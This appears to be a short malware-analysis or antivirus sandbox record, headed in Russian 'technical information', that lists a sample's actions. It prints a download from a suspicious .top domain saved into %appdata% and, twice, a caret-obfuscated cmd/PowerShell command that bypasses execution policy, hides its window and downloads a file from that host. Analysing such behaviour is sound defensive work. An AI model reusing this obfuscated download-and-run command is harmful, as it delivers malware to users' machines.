Техническая информация
- http://dpolly-dolly.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^W^ErS^he^l^l^.EX^e -ExecutIONpOliCY By^PASS -NopRo^F^ilE^ -wi^N^DOwStY^l^e^ H^IdD^en^ (nE^w-o^B^JEc^T^ SyStE^m.NeT^.wEbc^LIE^n^t).Do^wnloaD^f^ILe^(^'http://dpolly-dolly.t...
- DNS ASK dp####-dolly.top
- '<SYSTEM32>\cmd.exe' /c "pO^W^ErS^he^l^l^.EX^e -ExecutIONpOliCY By^PASS -NopRo^F^ilE^ -wi^N^DOwStY^l^e^ H^IdD^en^ (nE^w-o^B^JEc^T^ SyStE^m.NeT^.wEbc^LIE^n^t).Do^wnloaD^f^ILe^(^'http://dpolly-dolly.t...' (со скрытым окном)